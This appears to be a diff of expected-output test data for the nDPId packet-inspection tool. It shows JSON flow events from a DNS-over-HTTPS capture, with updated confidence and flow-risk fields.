-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}}
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
